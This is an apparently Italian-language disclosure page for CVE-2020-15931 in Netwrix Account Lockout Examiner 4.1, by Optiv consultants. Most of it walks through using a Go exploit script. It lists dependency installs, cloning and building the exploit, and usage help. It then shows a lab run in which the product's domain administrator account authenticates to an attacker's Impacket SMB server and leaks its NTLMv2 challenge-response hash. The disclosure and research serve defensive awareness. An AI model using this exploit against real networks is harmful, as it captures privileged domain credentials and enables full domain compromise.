
Netwrix Account Lockout Examiner 4.1 Vulnerabilità di divulgazione delle credenziali dell'account amministratore di dominio
Netwrix Account Lockout Examiner (ALE) precedente alla versione 5.1 consente a un avversario remoto non autenticato di attivare una connessione verso un sistema controllato dall'attaccante e catturare la risposta challenge-response NTLMv1/v2 di un account con privilegi di amministratore di dominio. L'account amministratore di dominio sarebbe già configurato con il prodotto, come richiesto per l'installazione. Un avversario può sfruttare la vulnerabilità generando un singolo evento Kerberos Pre-Authentication Failed (Event ID 4771) su un domain controller.
Maggiori dettagli sulla vulnerabilità sono disponibili nel seguente Blog

La vulnerabilità è stata scoperta sul campo da Robert Surace (@robsauce) e Daniel Min (@bigb0ss), consulenti di sicurezza Optiv, durante un security assessment. Individuata la CVE-2020-15931, Optiv ha contattato immediatamente Netwrix per divulgare responsabilmente la falla identificata.
Lo script di exploit è stato sviluppato in golang. Installare le seguenti dipendenze:
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config
Utilizza inoltre smbserver.py di Impacket.
pip install impacket
Infine, scaricare lo script di exploit e compilarlo.
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go
$ ./cve-2020-15931
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
(Nota: al momento della stesura, questo attacco può essere individuato solo tramite un attacco di tipo blind-based. Questo perché è difficile determinare se l'organizzazione target utilizzi Netwrix Account Lockout Examiner sulla propria rete per controllare le autenticazioni degli account oppure no.)
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
[+] DC: 10.10.0.2
[+] Domain: bosslab.com
[+] Username: b0ss1
[+] Password: wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []
Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931